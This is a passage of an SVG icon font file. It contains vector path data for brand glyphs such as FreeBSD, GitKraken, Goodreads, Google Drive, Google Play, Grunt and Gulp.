c-0.700195 1.09961 -1.40039 2.09961 -2.09961 3.2002c-0.300781 0.5 -0.600586 0.899414 -0.900391 1.39941c-0.700195 1.10059 -1.40039 2.10059 -2 3.2002c-0.299805 0.5 -0.599609 0.900391 -0.900391 1.40039c-0.699219 1.09961 -1.2998 2.2002 -2 3.2998
c-0.199219 0.400391 -0.5 0.799805 -0.699219 1.2002c-2.40039 4 -4.60059 8.09961 -6.80078 12.2002c-0.0996094 0.199219 -0.199219 0.299805 -0.299805 0.5c-0.599609 1.09961 -1.09961 2.19922 -1.7002 3.2998c-0.299805 0.599609 -0.599609 1.09961 -0.799805 1.7002
c-0.5 1 -1 2.09961 -1.5 3.09961c-0.299805 0.700195 -0.599609 1.2998 -0.899414 2c-0.5 1 -0.900391 2 -1.40039 3l-0.900391 2.09961c-0.399414 1 -0.899414 2 -1.2998 3c-0.299805 0.700195 -0.599609 1.5 -0.899414 2.2002l-1.2002 3
c-0.299805 0.799805 -0.600586 1.5 -0.900391 2.2998c-0.399414 1 -0.799805 2 -1.09961 3c-0.299805 0.900391 -0.600586 1.80078 -1 2.80078c-0.600586 1.59961 -1.10059 3.2998 -1.7002 4.89941c-0.299805 0.900391 -0.599609 1.7998 -0.900391 2.7998
c-0.299805 0.900391 -0.5 1.80078 -0.799805 2.7002c-0.299805 0.900391 -0.599609 1.90039 -0.799805 2.7998c-0.299805 0.900391 -0.5 1.80078 -0.799805 2.7002c-0.299805 1 -0.5 1.90039 -0.799805 2.90039c-0.200195 0.899414 -0.5 1.7998 -0.700195 2.7002
c-0.299805 1 -0.5 2 -0.700195 3c-0.200195 0.899414 -0.400391 1.69922 -0.599609 2.59961c-0.200195 1.09961 -0.5 2.2002 -0.700195 3.2002c-0.200195 0.799805 -0.299805 1.59961 -0.5 2.39941c-0.299805 1.30078 -0.5 2.7002 -0.799805 4
c-0.100586 0.600586 -0.200195 1.10059 -0.300781 1.7002l-0.899414 5.7002c-0.100586 0.599609 -0.200195 1.2998 -0.299805 1.90039c-0.200195 1.2998 -0.400391 2.59961 -0.5 3.89941c-0.100586 0.799805 -0.200195 1.5 -0.300781 2.2998
c-0.0996094 1.2002 -0.299805 2.40039 -0.399414 3.60059c-0.100586 0.799805 -0.200195 1.59961 -0.200195 2.39941c-0.0996094 1.2002 -0.200195 2.40039 -0.299805 3.5c-0.100586 0.800781 -0.100586 1.60059 -0.200195 2.40039
c-0.0996094 1.2002 -0.200195 2.40039 -0.200195 3.7002c0 0.799805 -0.0996094 1.5 -0.0996094 2.2998c-0.100586 1.2998 -0.100586 2.7002 -0.200195 4c0 0.700195 0 1.2998 -0.0996094 2c0 2 -0.100586 4 -0.100586 6c0 53.5 16.9004 103 45.7998 143.6
c2.30078 3.2002 4.7002 6.40039 7.10059 9.5c4.89941 6.2002 10.0996 12.3008 15.5996 18c2.7002 2.90039 5.5 5.7002 8.40039 8.40039c2.89941 2.7002 5.7998 5.40039 8.7998 8c4.5 3.90039 9.09961 7.59961 13.9004 11.2002c1.59961 1.2002 3.19922 2.39941 4.7998 3.5
c27.2998 19.5996 59 33.7002 93.2998 40.7998c16.0996 3.2998 32.9004 5 50 5s33.7998 -1.7002 50 -5c34.2998 -7 66 -21.0996 93.5996 -40.7002c1.60059 -1.2002 3.2002 -2.2998 4.80078 -3.5c4.7998 -3.59961 9.39941 -7.2998 13.8994 -11.2002
c12 -10.3994 23 -21.8994 32.7998 -34.3994c2.5 -3.10059 4.80078 -6.2998 7.10059 -9.5zM448 76.5v71.2998c0 2.10059 -1.59961 3.7002 -3.7002 3.7002h-22.2002c-2.09961 0 -3.69922 -1.59961 -3.69922 -3.7002v-25.7998h-29.5v144
c0 2.09961 -1.60059 3.7002 -3.7002 3.7002h-22.1006c-2.09961 0 -3.69922 -1.60059 -3.69922 -3.7002v-25.9004h-29.5v25.9004c0 2.09961 -1.60059 3.7002 -3.7002 3.7002h-22.2002c-2.09961 0 -3.7002 -1.60059 -3.7002 -3.7002v-25.9004h-29.5v25.9004
c0 4.7998 -6.5 3.7002 -9.5 3.7002v30.7002c6.7002 1.59961 13.7998 2.7998 20.7998 2.7998c8.80078 0 16.8008 -3.5 25.4004 -3.5c3.7002 0 22.4004 0.899414 22.4004 6.5v48.3994c0 2.10059 -1.60059 3.7002 -3.7002 3.7002c-4.2002 0 -12.2002 -3.5 -19.4004 -3.5
c-7.89941 0 -16.8994 3.5 -26.2998 3.5c-6.5 0 -12.9004 -0.899414 -19.2002 -2.2998v3.90039c4.40039 2.09961 7.40039 6.69922 7.40039 11.5c0 16.7998 -25.4004 16.7998 -25.4004 0c0 -4.80078 3 -9.5 7.40039 -11.5v-90.2002c-3 0 -9.5 1.09961 -9.5 -3.7002v-25.9004
h-29.5v25.9004c0 2.09961 -1.60059 3.7002 -3.7002 3.7002h-22.2002c-2.09961 0 -3.7002 -1.60059 -3.7002 -3.7002v-25.9004h-29.5v25.9004c0 2.09961 -1.59961 3.7002 -3.69922 3.7002h-22.1006c-2.09961 0 -3.7002 -1.60059 -3.7002 -3.7002v-144h-29.5996v25.7998
c0 2.10059 -1.59961 3.7002 -3.7002 3.7002h-22.0996c-2.10059 0 -3.7002 -1.59961 -3.7002 -3.7002v-71.2998c9.40039 -15.5 20.5996 -29.9004 33.5996 -42.9004c20.6006 -20.5996 44.5 -36.6992 71.2002 -48c13.9004 -5.89941 28.2002 -10.2998 42.9004 -13.1992v75.7998
c0 58.5996 88.5996 58.5996 88.5996 0v-75.7998c14.7002 2.89941 29 7.39941 42.9004 13.1992c26.7002 11.3008 50.5996 27.4004 71.2002 48c13 13 24.1992 27.4004 33.5996 42.9004z" />
    <glyph glyph-name="freebsd" unicode="&#xf3a4;" 
d="M303.7 351.8c11.0996 11.1006 115.5 77 139.2 53.2002c23.6992 -23.7002 -42.1006 -128.1 -53.2002 -139.2c-11.1006 -11.0996 -39.4004 -0.899414 -63.1006 22.9004c-23.7998 23.7002 -34.0996 52 -22.8994 63.0996zM109.9 379.9
c-31.6006 -19.4004 -57.9004 -46.5 -76.4004 -78.7002c-20.7998 36.2998 -44.5 89.0996 -27.9004 105.7c16.4004 16.5 68 -6.40039 104.301 -27zM406.7 274c3.2998 5.5 7 11.7998 10.8994 18.7998c17.6006 -31.2998 27.7002 -67.3994 27.7002 -105.8
c0 -119.1 -96.5 -215.6 -215.6 -215.6c-119.101 0 -215.601 96.5996 -215.601 215.6c0 119.1 96.5 215.6 215.601 215.6c35.8994 0 69.7002 -8.7998 99.5 -24.2998c-7.2998 -4 -13.9004 -8 -19.6006 -11.5996c-26 4.7002 -32.8994 -16.4004 -14.8994 -48.7002
c21.7998 -43.0996 89 -90.4004 109.3 -70.0996c5.40039 5.39941 6 14.7998 2.7002 26.0996z" />
    <glyph glyph-name="gitkraken" unicode="&#xf3a6;" horiz-adv-x="592" 
d="M565.7 329.9c11.7998 -31.6006 18.2998 -65.7002 18.2998 -101.4c0 -155.1 -122.6 -281.6 -276.3 -287.7v145.8c-8.40039 -0.5 -16.6006 -0.399414 -23.4004 0v-145.899c-153.7 6.2002 -276.3 132.7 -276.3 287.8c0 35.7002 6.5 69.7998 18.2998 101.3
c2.2998 6.2002 9.2998 9.2002 15.2998 6.60059c5.7002 -2.40039 8.5 -8.80078 6.30078 -14.6006c-10.9004 -29 -16.9004 -60.5 -16.9004 -93.2998c0 -134.6 100.4 -245.7 230.2 -262.7v123.7c-7.90039 1.59961 -15.4004 3.7002 -23 6.2002v-104
c-106.7 26 -185.9 122.1 -185.9 236.8c0 91.7998 50.7998 171.8 125.8 213.3c5.80078 3.2002 13 0.900391 15.9004 -5c2.7002 -5.5 0.700195 -12.0996 -4.7002 -15.0996c-67.8994 -37.7002 -113.899 -110.101 -113.899 -193.2c0 -93.4004 57.8994 -173.2 139.8 -205.4
v92.2002c-14.2002 4.5 -24.7998 17.7002 -24.7998 33.5c0 13.1006 6.69922 24.4004 17.2998 30.5c-8.2002 79.6006 -44.5 58.6006 -44.5 83.9004v14.7998c0 38 87.8994 161.7 129.1 164.7c2.60059 0.200195 5.10059 0.200195 7.60059 0
c41.0996 -2.90039 129 -126.7 129 -164.7v-14.7002c0 -25.2998 -36.2002 -4.39941 -44.5 -83.8994c10.5 -6.10059 17.2998 -17.4004 17.2998 -30.5c0 -15.8008 -10.7002 -29 -24.9004 -33.5v-92.2002c81.9004 32.2998 139.8 112.1 139.8 205.399
c0 83.2002 -46 155.601 -113.899 193.2c-5.2998 2.90039 -7.40039 9.60059 -4.7002 15.1006c2.90039 5.89941 10.2002 8.19922 15.9004 5c75 -41.5 125.8 -121.5 125.8 -213.301c0 -114.699 -79.2002 -210.899 -185.9 -236.8v104
c-7.5 -2.59961 -15.0996 -4.7002 -23 -6.2002v-123.699c129.9 17 230.2 128.1 230.2 262.699c0 32.8008 -6 64.3008 -16.9004 93.3008c-2.19922 5.69922 0.600586 12.1992 6.30078 14.5996c6 2.59961 13 -0.5 15.2998 -6.59961zM365.9 172.5
c-13.1006 0 -23.7002 -10.5996 -23.7002 -23.7002c0 -13.2002 10.7002 -23.7002 23.7002 -23.7002c13.0996 0 23.6992 10.6006 23.6992 23.7002c0 13.2002 -10.6992 23.7002 -23.6992 23.7002zM226.1 125.2c13.2002 0 23.7002 10.7002 23.7002 23.7002
c0 13.0996 -10.5996 23.6992 -23.7002 23.6992c-13.1992 0 -23.6992 -10.6992 -23.6992 -23.6992s10.5 -23.7002 23.6992 -23.7002z" />
    <glyph glyph-name="gofore" unicode="&#xf3a7;" horiz-adv-x="400" 
d="M324 128.2c54.2998 0 65.7002 -50.1006 67.7002 -77.7002c-46.5 -56.2998 -107.8 -82.5 -171 -82.5c-123.7 0 -220.7 101.5 -220.7 224c0 123.4 98 224 220.7 224c59 0 114.3 -23.2998 156.1 -65.5996l-62.2998 -63.3008c-25 25.4004 -58.2998 39.4004 -93.5996 39.4004
c-73.2002 0 -132.4 -60.2998 -132.4 -134.4c0 -74.1992 59.2002 -134.399 132.4 -134.399c33.5996 0 65.3994 12.7002 89.8994 35.7998v34.7002h13.2002zM311.9 240.7c47.6992 0 88.0996 -35 88.0996 -100.2v-30.5996c-15.5 26.6992 -42.5 41.7998 -76 41.7998h-118.4v89
h106.301z" />
    <glyph glyph-name="goodreads" unicode="&#xf3a8;" 
d="M299.9 256.8c5.09961 -37.2998 -4.7002 -79 -35.9004 -100.7c-22.2998 -15.5 -52.7998 -14.0996 -70.7998 -5.69922c-37.1006 17.2998 -49.5 58.5996 -46.7998 97.1992c4.2998 60.9004 40.8994 87.9004 75.2998 87.5c46.8994 0.200195 71.7998 -31.7998 78.2002 -78.2998
zM448 360v-336c0 -30.9004 -25.0996 -56 -56 -56h-336c-30.9004 0 -56 25.0996 -56 56v336c0 30.9004 25.0996 56 56 56h336c30.9004 0 56 -25.0996 56 -56zM330 134.8c0 0 -0.0996094 34 -0.0996094 217.3h-29v-40.2998c-0.800781 -0.299805 -1.2002 0.5 -1.60059 1.2002
c-9.59961 20.7002 -35.8994 46.2998 -76 46c-51.8994 -0.400391 -87.2002 -31.2002 -100.6 -77.7998c-4.2998 -14.9004 -5.7998 -30.1006 -5.5 -45.6006c1.7002 -77.8994 45.0996 -117.8 112.399 -115.199c28.9004 1.09961 54.5 17 69 45.1992
c0.5 1 1.10059 1.90039 1.7002 2.90039c0.200195 -0.0996094 0.400391 -0.0996094 0.600586 -0.200195c0.299805 -3.7998 0.199219 -30.7002 0.0996094 -34.5c-0.200195 -14.7998 -2 -29.5 -7.2002 -43.5c-7.7998 -21 -22.2998 -34.7002 -44.5 -39.5
c-17.7998 -3.89941 -35.5996 -3.7998 -53.2002 1.2002c-21.5 6.09961 -36.5 19 -41.0996 41.7998c-0.299805 1.60059 -1.2998 1.2998 -2.2998 1.2998h-26.7998c0.799805 -10.5996 3.19922 -20.2998 8.5 -29.1992c24.1992 -40.5 82.6992 -48.5 128.199 -37.4004
c49.9004 12.2998 67.3008 54.9004 67.4004 106.3z" />
    <glyph glyph-name="goodreads-g" unicode="&#xf3a9;" horiz-adv-x="383" 
d="M42.5996 44.7002h2.80078c12.6992 0 25.5 0 38.1992 -0.100586c1.60059 0 3.10059 0.400391 3.60059 -2.09961c7.09961 -34.9004 30 -54.5996 62.8994 -63.9004c26.9004 -7.59961 54.1006 -7.7998 81.3008 -1.7998c33.7998 7.40039 56 28.2998 68 60.4004
c8 21.5 10.6992 43.7998 11 66.5c0.0996094 5.7998 0.299805 47 -0.200195 52.7998l-0.900391 0.299805c-0.799805 -1.5 -1.7002 -2.89941 -2.5 -4.39941c-22.0996 -43.1006 -61.2998 -67.4004 -105.399 -69.1006c-103 -4 -169.4 57 -172 176.2
c-0.5 23.7002 1.7998 46.9004 8.2998 69.7002c20.5996 71.0996 74.5996 118.2 153.899 118.8c61.3008 0.400391 101.5 -38.7002 116.2 -70.2998c0.5 -1.10059 1.2998 -2.2998 2.40039 -1.90039v61.6006h44.2998c0 -280.301 0.0996094 -332.2 0.0996094 -332.2
c-0.0996094 -78.5 -26.6992 -143.7 -103 -162.2c-69.5 -16.9004 -159 -4.7998 -196 57.2002c-8 13.5 -11.7998 28.2998 -13 44.5zM188.9 411.5c-52.5 0.5 -108.5 -40.7002 -115 -133.8c-4.10059 -59 14.7998 -122.2 71.5 -148.601
c27.5996 -12.8994 74.2998 -15 108.3 8.7002c47.5996 33.2002 62.7002 97 54.7998 154c-9.7002 71.1006 -47.7998 120 -119.6 119.7z" />
    <glyph glyph-name="google-drive" unicode="&#xf3aa;" horiz-adv-x="512" 
d="M339 133.1l-163.6 282.9h161.199l163.601 -282.9h-161.2zM201.5 109.5h310.5l-80.5996 -141.5h-310.5zM154.1 380.6l82.9004 -141.399l-156.4 -271.2l-80.5996 141.5z" />
    <glyph glyph-name="google-play" unicode="&#xf3ab;" horiz-adv-x="512" 
d="M325.3 213.7l-220.7 221.3l280.801 -161.2zM47 448l256.6 -255.9l-256.6 -256c-13 6.80078 -21.7002 19.2002 -21.7002 35.3008v441.3c0 16.0996 8.7002 28.5 21.7002 35.2998zM472.2 222.4c19.2002 -14.3008 19.2002 -46.5 1.2002 -60.8008l-60.1006 -34.0996
l-65.7002 64.5l65.7002 64.5zM104.6 -51l220.7 221.3l60.1006 -60.0996z" />
    <glyph glyph-name="gripfire" unicode="&#xf3ac;" horiz-adv-x="352" 
d="M112.5 146.6c0 -26.8994 16.5996 -47.1992 32.5996 -69.5c22.5 -30.1992 44.2002 -56.8994 44.2002 -86.5c-0.0996094 -14.5 -4.39941 -29.6992 -17.5 -46.3994c0 5.2998 4.7998 12.2002 4.7998 22.2998c0 15.2002 -13 39.9004 -78.0996 86.5996
c-34.2998 29.1006 -66.5 58.5 -66.5 108.301c0 114.699 147.1 176.5 147.1 268.6c0 3.2998 -0.199219 6.7002 -0.599609 10c5.09961 -2.40039 39.0996 -43.2998 39.0996 -90.4004c0 -80.5 -105.1 -129.199 -105.1 -203zM317.8 185.6
c1.5 -8.39941 2.2002 -16.5996 2.2002 -24.5996c0 -51.7998 -29.4004 -97.5 -67.2998 -136.8c-1 -1 -2.2002 -2.40039 -3.2002 -2.40039c-3.59961 0 -35.5 41.6006 -35.5 53.2002c0 0 41.7998 55.7002 41.7998 96.9004c0 10.7998 -2.7002 21.6992 -9.09961 33.3994
c-1.5 -32.2998 -55.7002 -87.7002 -58.1006 -87.7002c-2.69922 0 -17.8994 22 -17.8994 42.1006c0 5.2998 1 10.7002 3.2002 15.7998c2.39941 5.5 56.5996 72 56.5996 116.7c0 6.2002 -1 12 -3.40039 17.0996l-4 7.2002c16.7002 -6.5 82.6006 -64.0996 94.7002 -130.9z" />
    <glyph glyph-name="grunt" unicode="&#xf3ad;" horiz-adv-x="384" 
d="M61.2998 258.7c0.5 4.89941 2.7998 10 7 12h0.100586c-4.60059 1.7002 -9.2002 3.09961 -13.5 4.09961c42.1992 10.2002 73.3994 -20.5996 83.0996 -31.7998c16.5996 -19.2002 35.5 -8.7998 35.5 -8.7998c0.299805 -11.1006 -10.2998 -19 -21.0996 -19.5
c1.19922 -15.4004 -13.9004 -32.5 -13.9004 -32.5s5.59961 15 2.7002 25.2998c-0.900391 3.2002 -2 6.09961 -3 8.5c-19.2998 -17.2002 -48 -1.5 -54.9004 6.09961c-9.59961 10.6006 -12.3994 23.8008 -12.7998 34.1006c-1.7998 -3.7998 -3.2998 -9.10059 -4 -16.6006
c0 0 -6.2998 9.10059 -5.2002 19.1006zM89.5996 260.5c-2.89941 -9.09961 -3.39941 -27.7002 6.90039 -35.2998c16.2998 -12.1006 32.2998 -5 38 -1.7002c-7.5 11.2998 -25.4004 26 -44.9004 37zM231.7 214.7c-10.7998 0.399414 -21.4004 8.39941 -21.2002 19.2998
c0 0 18.7998 -10.4004 35.5 8.7998c9.7002 11.2002 40.7998 42 83.0996 31.7998c-4.2998 -0.899414 -8.89941 -2.2998 -13.5 -4.09961h0.100586c4.09961 -1.7998 6.39941 -6.7998 7 -11.7998c1.2002 -10 -5.2002 -19.1006 -5.2002 -19.1006
c-0.599609 7.5 -2.2002 12.8008 -4 16.6006c-0.5 -10.2998 -3.2002 -23.5 -12.7998 -34.1006c-6.7998 -7.59961 -35.5 -23.3994 -54.7998 -6.09961c-1 -2.5 -2.10059 -5.2998 -3 -8.5c-2.90039 -10.2998 2.69922 -25.2998 2.69922 -25.2998s-15.0996 17 -13.8994 32.5z
M294.4 260.5c-19.5 -11 -37.4004 -25.5996 -44.9004 -37c5.7002 -3.40039 21.5996 -10.5 37.9004 1.59961c10.3994 7.7002 10 26.3008 7 35.4004zM160 29.5c4.09961 0 7 -0.900391 8.7998 -2.7002c2.2002 -2.2998 1.5 -5.2998 0.900391 -6.7998
c-1.10059 -2.7002 -5.5 -11.5996 -13 -19.7998c-2.7002 -2.90039 -6.60059 -4.60059 -11 -4.60059c-4.2998 0 -8.7002 1.60059 -11.7998 4.30078c-2.30078 2.09961 -10.2002 9.5 -13.7002 18.5996c-1.2998 3.40039 -1 6.09961 0.899414 8.09961
c1.30078 1.30078 4 2.90039 9.5 2.90039h29.4004zM349.2 130.7c0 0 29.2998 -22.5 21.0996 -70.9004c-5.2998 -29.5 -23.2002 -46 -47 -54.7002c-8.7998 -19.0996 -29.3994 -45.6992 -67.2998 -49.5996c-14.5 -11.7998 -34.5 -19.5 -63.5996 -19.5h-0.200195
c-29.2002 0 -49.2002 7.7002 -63.6006 19.5c-37.8994 3.90039 -58.5 30.5 -67.2998 49.5996c-23.7998 8.60059 -41.7998 25.2002 -47 54.7002c-8.59961 48.2002 20.6006 70.7998 20.6006 70.7998c2.39941 -17.8994 13 -33.8994 24.5996 -43.7998
c3.09961 22.7002 3.7002 55.5 3.7002 62.4004c0 14.7002 -9.5 24.5 -12.2002 26.0996c-2.5 1.5 -5.2998 3 -8.2998 4.60059c-18 9.59961 -40.4004 21.5996 -40.4004 43.6992c0 16.1006 9.2998 23.2002 15.4004 27.8008c0.799805 0.599609 1.5 1.19922 2.2002 1.69922
c2.09961 1.7002 3.69922 3 4.2998 4.40039c4.39941 9.7998 3.59961 34.2002 1.7002 37.5996c-0.600586 0.700195 -16.8008 21 -11.8008 39.2002c2 7.40039 6.90039 13.2998 14.1006 17c5.2998 2.7002 11.7998 4.2002 19.5 4.5c0.0996094 2 0.5 4 0.899414 5.90039
c0.5 2.59961 1.10059 5.2998 0.900391 8.09961c-0.400391 4.7002 -0.799805 9.10059 -2.2002 11.2998c-8.39941 13.3008 -28.7998 17.6006 -29 17.6006l-12.2998 2.39941l8.09961 9.40039c0.200195 0.200195 17.3008 17.5 46.3008 17.5c7.89941 0 16 -1.2998 23.8994 -3.5
c24.2998 -7.7998 42.9004 -30.5 49.4004 -39.2998c2 0.599609 3.89941 1.2002 5.89941 1.7002c-1 26.3994 20.7002 47.3994 28.2002 48.2998c0.5 -4.5 -0.399414 -22.2002 7.2002 -27.6006c2.2002 14.4004 9.59961 30.3008 39.0996 40.7002
c-6.2998 -16.7002 -0.799805 -30.7002 1.80078 -37.2002c20.0996 18.2002 33.6992 15.2002 33.6992 15.2002s-13.1992 -22.7002 -9 -38.5c3.30078 -0.799805 6.5 -1.7002 9.60059 -2.7002c6.5 8.80078 25.2002 31.5 49.3994 39.3008
c8.10059 2.59961 16.2002 3.89941 24.1006 3.89941c29 0 46.2002 -17.2998 46.2998 -17.5l8.09961 -9.5l-12.2998 -2.39941c-0.200195 0 -20.5996 -4.30078 -29 -17.6006c-1.39941 -2.2998 -1.7998 -6.59961 -2.2002 -11.2998
c-0.199219 -2.7998 0.300781 -5.5 0.900391 -8.09961c0.400391 -2 0.799805 -3.90039 0.900391 -5.90039c7.59961 -0.299805 14.1992 -1.7998 19.5 -4.5c7.19922 -3.7002 12.0996 -9.59961 14.0996 -17c4.90039 -18.2998 -11.2002 -38.5996 -11.7998 -39.2002
c-1.90039 -3.39941 -2.7002 -27.7998 1.7002 -37.5996c0.599609 -1.40039 2.19922 -2.7002 4.2998 -4.40039c0.700195 -0.599609 1.39941 -1.09961 2.2002 -1.7002c6.09961 -4.59961 15.3994 -11.5996 15.3994 -27.7998c0 -22.0996 -22.3994 -34.0996 -40.3994 -43.7002
c-2.90039 -1.59961 -5.80078 -3.09961 -8.30078 -4.59961c-2.69922 -1.59961 -12.1992 -11.4004 -12.1992 -26.0996c0 -6.90039 0.599609 -39.7002 3.69922 -62.4004c11.6006 9.90039 22.2002 25.7998 24.6006 43.7002zM305.7 410.3
c-17.7998 -5.7002 -31.6006 -23.0996 -37.7002 -32.2002c1.59961 -0.699219 3.09961 -1.39941 4.7002 -2.19922c2.59961 -1.2002 4.89941 -2.40039 7.09961 -3.7002c2.7002 5.5 8.40039 13.7002 20.7002 22.3994c8.2002 5.80078 18.2002 8.90039 28.7002 8.90039
c3.59961 0 6.7998 -0.400391 9.2002 -0.799805c3.2998 2.09961 6.59961 3.89941 9.69922 5.2998c-4.7998 2 -13.6992 5 -24.6992 5c-6.10059 0 -12.1006 -0.900391 -17.7002 -2.7002zM326.7 392.1c-7.40039 -0.299805 -14 -2.69922 -19.6006 -7
c-8 -6.39941 -12.0996 -17.6992 -13.5 -22.5c4.90039 -4.19922 8.2002 -8.09961 10.5 -11.1992c3.40039 1 7.30078 1.89941 11.5 2.69922c3.30078 4.5 3.90039 10.6006 4.40039 17c0.5 6.2002 1.09961 12.6006 4.40039 17.8008c0.699219 1.09961 1.5 2.19922 2.2998 3.19922
zM45.5996 402.7c2.40039 0.399414 5.60059 0.799805 9 0.899414c10.6006 0 20.5 -3.09961 28.8008 -8.89941c12.3994 -8.7002 18.0996 -17 20.6992 -22.4004c2.2002 1.2002 4.60059 2.5 7.10059 3.7002c1.59961 0.799805 3.2002 1.5 4.7998 2.2002
c-6.09961 8.89941 -19.9004 26.2998 -37.7002 32.0996c-5.7002 1.7998 -11.5996 2.7002 -17.7002 2.7002c-11 0 -19.8994 -3 -24.6992 -5c3.09961 -1.2998 6.39941 -3.09961 9.69922 -5.2998zM90.2998 362.6c-1.39941 4.80078 -5.5 16.1006 -13.5 22.4004
c-5.5 4.40039 -12.0996 6.7002 -19.5 7c0.799805 -1 1.60059 -2.09961 2.2998 -3.2002c3.30078 -5.2002 3.90039 -11.5996 4.40039 -17.7998c0.5 -6.40039 1 -12.5 4.2998 -16.9004c4.2002 -0.799805 8.10059 -1.7998 11.5 -2.69922c2.2002 3.19922 5.60059 7 10.5 11.1992z
M58.0996 188.1c8.7002 -5 18.1006 -16.7998 19 -34.1992c0.900391 -14.7002 -0.899414 -49.9004 -3.39941 -75.9004c12.5 -4.7998 26.7002 -6.40039 39.7002 -6.7998c2 4.09961 3.89941 8.5 5.5 13.0996c0.699219 1.90039 19.5996 51 26.3994 62.2002
c-5.39941 -39 -17.5 -73.7002 -23.5 -89.5996c3.40039 0.399414 7.2998 0.699219 11.7002 0.699219h117c4.40039 0 8.2002 -0.199219 11.7002 -0.699219c-6 15.8994 -18 50.5996 -23.5 89.5996c6.7998 -11.0996 25.7002 -60.2002 26.3994 -62.2002
c1.60059 -4.59961 3.5 -9 5.5 -13.0996c13 0.399414 27.3008 2 39.7002 6.7998c-2.5 26 -4.2998 61.2998 -3.39941 75.9004c1.09961 17.5 10.3994 29.1992 19.0996 34.1992c2.7002 1.5 5.5 3.10059 8.40039 4.60059c14.7998 8 30.1992 16.2998 30.1992 30.5
c0 11.0996 -4.2998 14.5 -8.89941 18.2002l-0.5 0.399414c-0.700195 0.600586 -1.5 1.2002 -2.2002 1.7998c0.900391 -7.19922 1.90039 -13.2998 2.7002 -14.8994c0 0 -12.1006 15 -15.7002 44.2998c-1.40039 11.5 1.09961 34.2002 5.09961 43
c-0.199219 -4.90039 0 -9.7998 0.300781 -14.4004c0.399414 0.900391 0.799805 1.60059 1.2998 2.2002c3.2998 4 11.8994 17.5 9.39941 26.6006c-1 3.39941 -3.19922 6 -6.69922 7.7998c-3.80078 1.89941 -8.80078 2.89941 -15.1006 2.89941
c-12.2998 0 -25.8994 -3.7998 -32.8994 -6c-25.1006 -7.89941 -55.4004 -30.8994 -64.1006 -37.6992c-0.200195 -0.200195 -0.399414 -0.300781 -0.399414 -0.300781l-5.60059 -3.89941l3.5 5.7998c0.200195 0.299805 19.1006 31.4004 53.1006 46.5
c-2 2.90039 -7.40039 8.2002 -21.6006 15.0996c-21.3994 10.5 -46.3994 15.8008 -74.2998 15.8008c-27.7998 0 -52.9004 -5.30078 -74.2998 -15.8008c-14.2002 -7 -19.6006 -12.1992 -21.6006 -15.0996c34.1006 -15.0996 53 -46.2002 53.2002 -46.5l3.5 -5.7998
l-5.59961 3.89941s-0.200195 0.100586 -0.400391 0.300781c-8.7002 6.7998 -39 29.6992 -64.0996 37.6992c-7 2.30078 -20.6006 6 -32.9004 6c-6.2998 0 -11.2998 -1 -15.0996 -2.89941c-3.60059 -1.7998 -5.7998 -4.2998 -6.7002 -7.7998
c-2.40039 -9.10059 6.2002 -22.6006 9.40039 -26.6006c0.5 -0.599609 0.899414 -1.39941 1.2998 -2.2002c0.299805 4.60059 0.5 9.5 0.299805 14.4004c4 -8.7002 6.5 -31.5 5.09961 -43c-3.59961 -29.2998 -15.6992 -44.2998 -15.6992 -44.2998
c0.799805 1.59961 1.7998 7.7002 2.69922 14.8994c-0.799805 -0.599609 -1.5 -1.19922 -2.19922 -1.7998l-0.5 -0.399414c-4.60059 -3.60059 -8.90039 -7.10059 -8.90039 -18.2002c0 -14.2002 15.2998 -22.5 30.2002 -30.5c2.7998 -1.5 5.7002 -3 8.39941 -4.60059z
M34.7998 43.4004c11.9004 -19.7002 35.5 -29.4004 58.2002 -29.5c-4.5 13.2998 -3.09961 24 4.09961 31.7998l1.40039 1.39941c1.7998 2.40039 4.2998 5.80078 7 10c-27.2002 1.10059 -63.5 11 -74.4004 45.4004c-5 -5 -8.39941 -39.0996 3.7002 -59.0996zM80.5 -0.0996094
c6.5 -9.5 16.5 -19.6006 30.9004 -25.5c-4.90039 7.19922 -8.80078 15.0996 -12.3008 23.0996c-6.39941 0.5 -12.5996 1.2998 -18.5996 2.40039zM192 -50.2002c60.5996 0.100586 78.2998 45.9004 84.9004 64.7002c3.59961 10.5 3.2998 18.2998 -0.900391 23.0996
c-2.7998 3.30078 -9.5 7.2002 -24.5996 7.2002h-118.801c-15.0996 0 -21.6992 -3.89941 -24.5996 -7.2002c-4.2998 -4.89941 -4.59961 -12.5996 -0.900391 -23.0996c6.60059 -18.9004 24.3008 -64.5996 84.9004 -64.7002zM272.6 -25.5996
c14.4004 5.89941 24.4004 16 30.9004 25.5c-6 -1.10059 -12.2002 -1.90039 -18.5996 -2.40039c-3.5 -8 -7.40039 -15.9004 -12.3008 -23.0996zM349.2 43.4004c12.2002 19.8994 8.7998 54 3.7998 59c-10.9004 -34.4004 -47.2002 -44.2002 -74.4004 -45.4004
c2.7002 -4.2002 5.2002 -7.59961 7 -10c0.5 -0.5 1 -1 1.40039 -1.5c7.2002 -7.7002 8.59961 -18.5 4.09961 -31.7998c22.5 0.399414 46.1006 10 58.1006 29.7002zM191.9 260.3c-12.7002 0.200195 -27.2002 17.7998 -27.2002 17.7998
c9.89941 -6 18.7998 -8.09961 27.2998 -8.2998c8.5 0.200195 17.4004 2.2998 27.2998 8.2998c0 0 -14.5 -17.6992 -27.2002 -17.7998h-0.199219zM253.6 29.5996c5.40039 -0.0996094 8.10059 -1.69922 9.40039 -3c1.90039 -1.89941 2.2002 -4.59961 0.900391 -7.89941
c-3.5 -8.90039 -11.4004 -16.1006 -13.7002 -18.1006c-3.10059 -2.59961 -7.40039 -4.19922 -11.7998 -4.19922c-4.40039 0 -8.30078 1.59961 -11 4.5c-7.5 8 -12 16.6992 -13 19.2998c-0.600586 1.5 -1.30078 4.39941 0.899414 6.7002
c1.7002 1.7998 4.7002 2.69922 8.90039 2.69922h29.3994z" />
    <glyph glyph-name="gulp" unicode="&#xf3ae;" horiz-adv-x="255" 
d="M209.8 56.9004l-14.0996 -24.6006l-4.60059 -80.2002c0 -8.89941 -28.2998 -16.0996 -63.0996 -16.0996s-63.0996 7.2002 -63.0996 16.0996l-5.80078 79.4004l-14.8994 25.4004c41.2002 -17.3008 126 -16.7002 165.6 0zM13.7998 310.2
c30.7002 -17 197.8 -16.9004 228.3 0.200195l-14.7998 -136.801c-4.7998 -4.19922 -11.5996 -10.1992 -16.5996 -14.0996c-1.60059 -1.2002 -6 -4.7002 -8 -4.7002c-1.2998 0 -2.2002 0.5 -2.2002 1.7998c0.0996094 1 3.40039 4.5 5 6.40039
